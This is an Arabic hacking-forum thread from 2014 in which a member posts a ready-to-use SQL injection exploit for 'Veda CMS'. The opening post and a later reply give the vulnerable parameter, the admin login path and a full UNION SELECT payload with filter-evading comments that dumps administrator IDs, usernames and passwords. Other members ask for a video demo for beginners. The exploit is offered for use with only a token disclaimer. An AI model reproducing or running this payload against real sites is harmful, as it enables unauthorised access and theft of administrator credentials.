قديم 11-16-2014, 10:29 PM   المشاركة رقم: 1
الكاتب
king alhrby1
سبحان الله وبحمده سبحان الله العظيم
 
الصورة الرمزية king alhrby1
المعلومات  
التسجيل: Apr 2012
العضوية: 136657
الدولة: المدينه المنورة
المشاركات: 3,253
بمعدل : 1.34 يوميا
الإتصال king alhrby1 غير متواجد حالياً


المنتدى  
:: new :: Veda CMS - SQL Injection

السلام عليكم ورحمة الله وبركاته

# !! الثغره التي طرحت ستكون مسؤول في استخدامها أمام الله .. وأنا ابرء الذمه من الاستغلال السيئ لها ,, لأنها مجرد تطوير لمعلوماتك

كود PHP:
***************************************************
# Title: Veda CMS - SQL Injection
# Author: Dr.***
# Vendor Homepage: http://vedadesigns.net/
# Contact: u8p@hotmail.com ; skype: dr.***559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - jsass - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - ابو اميره
# !! الثغره التي طرحت ستكون مسؤول في استخدامها أمام الله .. وأنا ابرء الذمه من الاستغلال السيئ لها ,, لأنها مجرد تطوير لمعلوماتك 
***************************************************
aSQL Injection
parameter Infected 
escort_id )

# information english

# Most of the sites that ride pornographic Scripts - Loophole raised will be responsible in their use before God .. I exonerate disclosure of bad exploitation of her,, they just develop FYI

# information arabic

# معظم المواقع الي مركبه سكربت اباحية - وانا برئ براه كامله منها بستخدام سئ و مشاهده صور اباحية و غير ذلك


# are you ready :D 


# login admin -> : /vedacms/login.php
# file infected -> : profile.php
# Full exploitation -> : /profile.php?escort_id=-4'+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat(admin_id,0x3a,admin_****,0x3a,admin_pass),3,4,5,6,7,8,9,10,11+from+vedaAdmin--+-- 
# exp : http://localhost/pentester/scripts/vedacms/profile.php?escort_id=-4%27+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat%28admin_id,0x3a,admin_****,0x3a,admin_pass%29,3,4,5,6,7,8,9,10,11+from+vedaAdmin--+-- 












توقيع : king alhrby1

إذا تعمد الآخرين فهمك بطريقة خاطئة لا ترهق نفسك بالتبرير ، فقط أدر ظهرك و عطهم مقفاك و استمتع بالحياة

عرض البوم صور king alhrby1   رد مع اقتباس

قديم 11-19-2014, 06:09 PM   المشاركة رقم: 2
الكاتب
مستر قلق
.:: { اسد صنعاء } ::.
المعلومات  
التسجيل: Feb 2009
العضوية: 10021
المشاركات: 9,407
بمعدل : 2.61 يوميا
الإتصال مستر قلق غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

يا ريت توضح الثغره اكثر وتعمل شرح وتطبق في موقع علشان يكون مفهوم اكثر للاعضاء

واشكرك اخوي king alhrby1












عرض البوم صور مستر قلق   رد مع اقتباس

قديم 11-20-2014, 01:15 PM   المشاركة رقم: 3
الكاتب
برنس الرياض
.:: عضو مشارك ::.
 
الصورة الرمزية برنس الرياض
المعلومات  
التسجيل: Jun 2011
العضوية: 99976
المشاركات: 180
بمعدل : 0.07 يوميا
الإتصال برنس الرياض غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

لاهنت ع الثغره
لو ترفعها ملف txt احسن نص الكلام مشفر












عرض البوم صور برنس الرياض   رد مع اقتباس

قديم 11-20-2014, 05:25 PM   المشاركة رقم: 4
الكاتب
king alhrby1
سبحان الله وبحمده سبحان الله العظيم
 
الصورة الرمزية king alhrby1
المعلومات  
التسجيل: Apr 2012
العضوية: 136657
الدولة: المدينه المنورة
المشاركات: 3,253
بمعدل : 1.34 يوميا
الإتصال king alhrby1 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

اقتباس:

يا ريت توضح الثغره اكثر وتعمل شرح وتطبق في موقع علشان يكون مفهوم اكثر للاعضاء

واشكرك اخوي king alhrby1
ماشوف يحتاج لها شرح فقط يخش لموقع و يحط الاستغلال كامل

صح لكود مشفر و الكلمه المشفره هي n a m e


اقتباس:

لاهنت ع الثغره
لو ترفعها ملف txt احسن نص الكلام مشفر
شوف الاستغلال كامل
كود PHP:
/profile.php?escort_id=-4'+/*!12345UnIoN*/+/*!12345sElEcT*/+1,group_concat(admin_id,0x3a,admin_n a m e,0x3a,admin_pass),3,4,5,6,7,8,9,10,11+from+vedaAdmin--+-- 
امسح لفراغات الي عند n a m e












توقيع : king alhrby1

إذا تعمد الآخرين فهمك بطريقة خاطئة لا ترهق نفسك بالتبرير ، فقط أدر ظهرك و عطهم مقفاك و استمتع بالحياة

عرض البوم صور king alhrby1   رد مع اقتباس

قديم 11-20-2014, 07:23 PM   المشاركة رقم: 5
الكاتب
عبدالله xp
.:: عضو ::.
المعلومات  
التسجيل: May 2013
العضوية: 180226
المشاركات: 83
بمعدل : 0.04 يوميا
الإتصال عبدالله xp غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

يعطيك العافيه يا كنق

لو كان الشرح فديو كان سهلة على اخوان المبتدئين
مع ان الثغره ما يبي لها شرح لكن تسهل على اخوانا

آستمر يابطل + معجب بمواضيعك بتوفيق












عرض البوم صور عبدالله xp   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
New ~! SQL injection BaTrYoT HaCkeR [ SQL-injection ] 9 03-25-2012 12:07 AM
دالـتـيـن للـحمـاية الـتـامـة مـن ثـغرات الــSql injection و Blind sql injection DarkCoder [ الـ php and html ] 2 05-05-2011 12:11 AM
SQL Injection Evil-z [ ثــغـرات الأعــضــاء] 11 02-15-2011 09:34 PM
[ طلب ] اوامر SQL injection & Blind sql injection && XSS hitler-xp [ مشاكل وحلول اختراق المواقع ] 2 01-08-2011 08:58 PM


الساعة الآن 07:59 PM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.